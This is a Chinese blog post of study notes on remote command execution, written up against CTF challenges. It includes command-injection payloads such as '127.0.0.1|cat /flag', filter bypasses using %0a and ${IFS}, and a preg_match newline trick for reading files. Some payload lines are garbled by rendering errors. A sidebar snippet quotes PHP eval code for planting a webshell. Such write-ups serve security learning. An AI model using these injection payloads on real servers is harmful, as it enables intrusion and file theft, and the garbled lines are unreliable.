RCE学习(一)(2)

最新推荐文章于 2024-08-02 18:28:44 发布
最新推荐文章于 2024-08-02 18:28:44 发布
阅读量1k 收藏 10
点赞数 16
分类专栏: 程序员 文章标签: 学习 服务器 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84972703/article/details/138777013
版权

dir /ah /os    //显示当目下隐藏的文件和目录,按文件大小从小到大排序

(2)Linux

1、ls:列出目录

2、pwd:显示当前所在的目录

3、cat:由第一行开始查看文件

4、tac:由最后一行到第一行查看

5、more:逐项查看文件,按空格继续,最后自己退出

6、less:逐行查看文件,按方向键,不可主动退出,按q退出

7、head:只查看文件前十行

8、tail:只查看文件后十行

三)替换符

%0a 换行符

%0d 回车符

$*   在shell命令执行下为空

${IFS} 表示空格

  • 一般做题步骤

分三步执行:

1、ping

2、进入flag_is_here文件夹

3、列举flag_is_here文件夹下的文件

五)空格绕过

关于preg_match函数

利用 preg_match(),我们可以完成字符串的规则匹配。如果找到一个匹配,preg_match() 函数返回 1,否则返回 0。还有一个可选的第三参数可以让你把匹配的部分存在一个数组中。在验证数据时这个功能可以变得非常有用。

函数形式

preg_match(string $pattern, string KaTeX parse error: Expected 'EOF', got '&' at position 16: subject, array &̲matches);

pattern

要搜索的模式串,字符串类型
sbuject

输入的字符串,字符串类型
matches

可选,用来存放搜索结果, m a t c h e s [ 0 ] 存放所有匹配的字符串, matches[0]存放所有匹配的字符串, matches[0]存放所有匹配的字符串,matches[1]用来存放第一个匹配的字符串,$matches[2]用来存放第三个匹配的字符串,以此类推

二.实训

1.[ACTF2020 新生赛]Exec

先用127.0.0.1ping一下 正常显示 查看根目录 没发现flag 继续访问上一级目录 发现flag

127.0.0.1|ls

输入127.0.0.1|ls… /

输入127.0.0.1|cat /flag

2.[GXYCTF2019]Ping Ping Ping

先用127.0.0.1ping一下 正常回显 查看当前目录 发现了flag 之后发现符号被禁止了 使用替换符 再次查看flag 发现又被禁了 所以我们先查看根目录即可看到什么语句符号被禁 之后便可以据此修改抓取flag 即可得到。

3.ctfhub综合练习

本题过滤许多,尝试逐步绕过

首先列举目录127.0.0.1%0als# 其次列举文件夹下的文件 看到了一些禁用的符号对命令进行修改逐个绕过

127.0.0.1%0Als${IFS}f’’lag_is_here

看到了flag所在 于是查看文件内容

127.0.0.1%0als I F S c d f ’’ l a g _ i s _ h e r e {IFS}cdf’’lag\_is\_here%0atac IFScdf’’lag_is_here{IFS}f’’lag_

最后查看源码 即可找到本题flag

4.[FBCTF2019]RCEService

打开网页,发现输入框,提示命令以json格式输入,先试试:

{“cmd”: “ls”}

发现了回显根目录,输入其他命令发现进行了过滤,说明用到了preg_match函数。

因为preg_match函数只匹配第一行,所以可以利用换行符%0A来构造payload。

查看home目录:

/?cmd={%0A"cmd": “ls /home”%0A}

发现rceservice文件夹,查看rceservice文件夹:

/?cmd={%0A"cmd": “ls /home/rceservice”%0A}

发现flagjail两个文件,输出flag文件,输入url:

/?cmd={%0A"cmd": “/bin/cat /home/rceservice/flag”%0A}即可查看到flag

参考资料:https://blog.csdn.net/kongtaoxing/article/details/124201990

http://t.csdnimg.cn/MqASO

http://t.csdnimg.cn/qIJrS

最后

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。

img

img

img

img

img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

-iook5n7w-1715539856019)]

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!

由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!

2401_84972703
关注
专栏目录
Windows Server2019安全基线等保参考要求
weixin_52364868的博客
04-27 1628
Windows Server的基线安全(等保要求) 检查项类别 名称 方式 检查项预期 是否达标 加固建议 文档 IP协议 防火墙TCP/IP筛选配置 手动 业务所需的TCP,UDP端口和IP协议是否开放 0 开放业务所需的TCP,UDP端口和I
RCE姿势学习:从存储型XSS漏洞到RCE利用
2301_79205724的博客
08-31 497
很多同学在挖掘漏洞的中期都会有一个疑问:为什么别人挖到的都是高危或者严重漏洞,而我总是只能挖到一些信息泄露或者常规的XSS呢?来询问这个问题的人其实非常非常多,但其实归根结底都是一个原因,漏洞没有深入利用。所以今天咱们就来学习一下大佬们是怎么利用一个XSS来RCE的思路吧。后续利用RCE的内容比较难,需要有一定编程能力才能比较好理解,所以前面说到漏洞没有深入利用的问题,其原因百分之八十是源于你基础不够扎实,你的“地基”决定了你的高度,所以呀学习千万不能图快学成个脚本小子哦。
AAA-------网安的一种管理机制--认证授权计费
2401_84970893的博客
05-12 445
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
MySQL第05章_排序与分页
LeungKiChen
11-23 523
MySQL第05章_排序与分页 #第05章_排序与分页 #1. 排序 # 如果没有使用排序操作,默认情况下查询返回的数据是按照添加数据的顺序显示的。 SELECT * FROM employees; # 1.1 基本使用 # 使用 ORDER BY 对查询到的数据进行排序操作。 # 升序:ASC (ascend) # 降序:DESC (descend) # 练习:按照salary从高到低的顺序显示员工信息 SELECT employee_id,last_name,salary FROM emp.
MySQL order by关键字详解,order by排序
热门推荐
libaiup的博客
11-24 1万+
关键字一、order by 简介1)order by 的作用2)语法格式二、order by 使用1)按照字段名排序2)按照索引进行排序3)降序4)按照多列排序一、order by 简介ORDER BY 关键字用于对结果集进行「排序」。1)order by 的作用ORDER BY 关键字可以使查
Java字节码插桩玩法(Javassist)
Alan0517
11-28 2257
Javassit介绍 Javassit是一个开源的分析,编辑,和创建Java字节码的类库,其主要优点在于简单,而且快速,直接使用java编码的形式,而不需要了解java虚拟机指令,就能动态改变类结构,或者动态生成 注: 也可以使用ASM实现,但是需要学会操作字节码指令,学习成本高 运行时.jar javaagent.jar 入口方法 main(String[]) premain(String,instrumcent) 参数 main-class premain-class 运行 j
log4j2_rce 项目
02-23
本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2_rce"入手,结合其描述,探讨这一漏洞的成因、影响以及如何利用和防范。 首先,Log4j2是...
利用无参数的RCE注入写一个一句话木马
qq_51553814的博客
10-22 3440
昨天做了一个无参数注入RCE的题,学到后面发现还可以直接用RCE写一个一句话木马进去 今天来总结一下 以下是源码 <?php header("content-type:text/html;charset=utf-8"); if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } else { echo "error"; } highlight_file
phpstudy后门rce批量利用脚本的实现
10-15
【知识点详解】 本文主要探讨了如何实现针对PHPStudy后门的远程命令执行(RCE)批量利用脚本。...通过学习这篇内容,读者不仅可以理解如何利用PHPStudy后门,还能学到Python编程、网络请求和安全测试的基础知识。
Logo_s 230RCE_spanish_Logo230RCE_
10-03
这款软件的西班牙语版本,"Logo_s 230RCE_spanish_Logo230RCE_",旨在为西班牙语使用者提供一个友好的学习环境,让他们在学习编程的同时,也能享受母语的便利。 Logo 230RCE的核心在于其图形化编程系统,用户可以...
niushop支付漏洞
最新发布
qq_68186313的博客
08-02 262
2、开始选购商品为【巧克力】选择其购买的数量为1;使用burpsuite等抓包工具,抓取数据包后,修改数据包中的参数从而达到支付篡改的目的;3、将包中的“goods_id=1&num=1”改为“goods_id=1&num=-1”常见漏洞利用手段:替换支付,重复支付,最小额支付,负数支付,溢出支付,优惠卷支付。改的参数:商品ID,购买价格,购买数量,手机号码,订单D,支付状态。1、访问购物站点并注册用户abcde:123456。
03-构建xss漏洞环境(1)
2401_84968222的博客
05-11 433
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
mysql order by 排序_MySQL中order by 排序必知
weixin_31281003的博客
01-18 823
在开发过程时,我们经常会遇到 order by排序操作,那么你知道什么时候MySQL才会进行排序操作,什么时候不需要时间排序操作?,下面我们就从一个很小的例子中了解一下排序场景。表结构如下:CREATE TABLE t (id int(11) unsigned NOT NULL AUTO_INCREMENT,city varchar(16) NOT NULL,name varchar(16) N...
nmap
weixin_33836223的博客
07-31 91
目标规范: 可以通过主机名, IP地址,网络等 例:scanme.nmap.org, dream4.org/24, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: 从指定文件获取主机或网络 -iR <num hosts>: 随机选择主机,(0 不限制扫描主机数) --exclude &lt...
Java Filter 型内存马调试系列 (三)——一种Tomcat全版本获取StandardContext的新方法(全网首次发布,精调无错版)_standardcontext获取
2401_84968582的博客
05-12 326
# 最后**自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。****深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!****因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。**!!!!!
java插桩-javaassist
关注网络安全、云原生安全
08-24 3456
简介 Javassist (JAVA programming Assistant,Java编程助手) 是一个用Java编辑字节码的类库。它使Java程序可以在运行时定义新类,并在JVM加载它时修改类文件。 与其他类似的字节码编辑器不同,Javassist提供两个级别的API:源代码级别和字节码级别。 如果使用源代码级API,则可以在不了解Java字节码规范的情况下编辑类文件。整个API仅使用Java语言的词汇表进行设计。甚至可以以源文本的形式指定插入的字节码。Javassist可以即时对其进行编译。
golang 两个一样的字符串不相等_那些神一样的软件测试员,总会那么一两个你不知道的测试技术…...
weixin_32251071的博客
12-25 511
插桩技术指在保证原有程序逻辑完整性的基础上,在程序中插入探针,通过探针采集代码中的信息(方法本身、方法参数值、返回值等)在特定的位置插入代码段,从而收集程序运行时的动态上下文信息。一、"插桩"式技术实现原理"插桩"式实现通过两个阶段,动态HooK和污点传播。(一)动态HooK阶段技术原理动态Hook阶段,越靠近底层,拿到的应用数据越详尽,数据量也越大,技术难度也越高;以Java为例,最常见的Hoo...
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 385
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
mysql 排序
qq_42341721的博客
08-01 431
MySQL 排序 我们知道从 MySQL 表中使用 SQL SELECT 语句来读取数据。 如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的 ORDER BY 子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果。 语法 以下是 SQL SELECT 语句使用 ORDER BY 子句将查询数据排序后再返回数据: SELECT field1, field2,...f...
ctfhub rce
09-01
CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。这样的技能在网络安全领域特别重要。 请注意,RCE是一种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值